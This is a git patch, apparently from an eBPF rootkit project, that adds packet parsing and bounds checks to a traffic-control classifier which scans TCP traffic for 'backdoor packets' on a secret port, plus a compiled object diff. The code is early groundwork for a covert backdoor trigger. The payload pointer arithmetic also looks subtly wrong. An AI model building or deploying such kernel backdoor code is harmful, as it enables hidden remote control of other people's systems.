From 43ccb6cd3dd496bb6f681e5f92d5552bc14a9e8a Mon Sep 17 00:00:00 2001 From: h3xduck Date: Wed, 13 Apr 2022 20:46:06 -0400 Subject: [PATCH] Added packet parsing and bound checking --- src/ebpf/include/bpf/tc.c | 35 ++++++++++++++++++++++++++++++++--- src/tc.o | Bin 1120 -> 2624 bytes 2 files changed, 32 insertions(+), 3 deletions(-) diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c index ece886f..8f3eca9 100644 --- a/src/ebpf/include/bpf/tc.c +++ b/src/ebpf/include/bpf/tc.c @@ -19,27 +19,56 @@ int classifier(struct __sk_buff *skb){ //We are interested on parsing TCP/IP packets so let's assume we have one //Ethernet header struct ethhdr *eth_hdr = data; + if ((void *)eth_hdr + sizeof(struct ethhdr) > data_end){ + bpf_printk("ETH\n"); + return TC_ACT_OK; + } if(eth_hdr->h_proto != htons(ETH_P_IP)){ //Not an IP packet + bpf_printk("IP\n"); return TC_ACT_OK; } //IP header - struct iphdr *ip_hdr = (struct iphdr*)data + sizeof(struct ethhdr); + struct iphdr *ip_hdr = (struct iphdr*)(data + sizeof(struct ethhdr)); + if ((void *)ip_hdr + sizeof(struct iphdr) > data_end){ + bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip_hdr, data, data_end); + return TC_ACT_OK; + } if(ip_hdr->protocol != IPPROTO_TCP){ + bpf_printk("TCP\n"); return TC_ACT_OK; } //TCP header - struct tcphdr *tcp_hdr = (struct tcphdr *)data + sizeof(struct ethhdr) + sizeof(struct iphdr); + struct tcphdr *tcp_hdr = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); + if ((void *)tcp_hdr + sizeof(struct tcphdr) > data_end){ + bpf_printk("TCP CHECK\n"); + return TC_ACT_OK; + } //We now proceed to scan for our backdoor packets - __u16 dest_port = ntohs(tcp_hdr->dest); if(dest_port != SECRET_PACKET_DEST_PORT){ + bpf_printk("PORT CHECK\n"); return TC_ACT_OK; } + //Mark skb buffer readable and writable + //bpf_skb_pull_data(skb, 0); + + __u32 payload_size = ntohs(ip_hdr->tot_len) - (tcp_hdr->doff * 4) - (ip_hdr->ihl * 4); + char* payload = (void *)(tcp_hdr + tcp_hdr->doff*4); + if ((void*)payload + payload_size > data_end){ + bpf_printk("PAYLOAD CHECK\n"); + return TC_ACT_OK; + } + + bpf_printk("PAYLOAD size: %u\n", payload_size); + + + + return TC_ACT_OK; diff --git a/src/tc.o b/src/tc.o index d1d332078a4b97e67bc1fb84865103757cdddb76..54c02b5b055177bbe5f77f87d16971e20d749b6f 100644 GIT binary patch literal 2624 zcmbtWJ!}+56n^LPVOV~gP#9PN+60hL1cwa*1fe*5m>6*qD|Awl25Y@u!-?hRb`NAY zP-tinWg%(rnC;FN=ZS15J8k6Q9u%PkH)C*(aL7KL@?z0SU*1ZV$`6Noa?i0a#4}cI2vAritOH17RJ!7vz-@qKT+v^lf)(f3szp&ic zC@hT(3<(eWr+kO{*&k$;-2Qek&}%C@i0f;fE(C~5|I7A2=MY_V|IK)BR~(1# zqVUM`Owb9S6GxYicHMUwev}0TpWEYg3w4Q^2M)brUG{jbtH7aGtjj6is{@~$sGsgv zmwhbL>p+req^OB|Ua|CxrtM^t%ti(VrH;rWM(XBuYu0_ILVrm-J?SK_GuPn|%PmZ+ z`s8}gv;3Tvd=>l3_h7ru0rcDdT9z^Ut*GhImmFw-$j@_z0b#@RI`qn>lwh0-J z9rUx09q0D{*7mDVr4Gl%|J3ByF{Z;`0VQgsUkH7{{f*hy9l}yOLAP@aEj_b7Jf`Fp z0wtH{>7|vY7a5QIEQ{;-j}2HkbNmGN&&ua#m}T;~{>w(X8`?Qoa6k+5^G>jh&$yy zW515vBJ76GI=_@Lhfw-#u2sa3L*MyGo~j;E>E>BleQRwAJ+N6nOl16u3*vvqx4b?` z@0Z04mET0KOp9oq!niNn~pxenz`vQM>5 z0imh56-JlSh^k2xSECD4vq^9%qE1*1shW0@PB6{%#wF0k`1t755k(FwGIod+ub{ag zJXU31qz>w3O%G^R)BTzqvy}DzKbO?lz{lC-Z<_wzKeQZJ<&)nE!0^p2j#`l^%uQVk z1ULQkO}&h~{&`_on$`OIGek{ZX-Cr*o}D|5|IQTtZT<0z5*XEThM4#b-Ng%-+c`|M zz8$a8Gxl&D1GC$FZUz5#{Cing@_=K4M!f_CYJ z|NsBr0(6ipP^cA%*?@QpM4DkLke+;nMU%rlzy~Zexs+97@n5@Xr zFnJ-TJY&G*gB%hZPy=KqKje^~?7%6(^p|0B6sH{%2jk>foOYrcpxOkW>Okt*Ccov> V*06xeR6u1wTxKAKnJ57j2LM%FN6!EN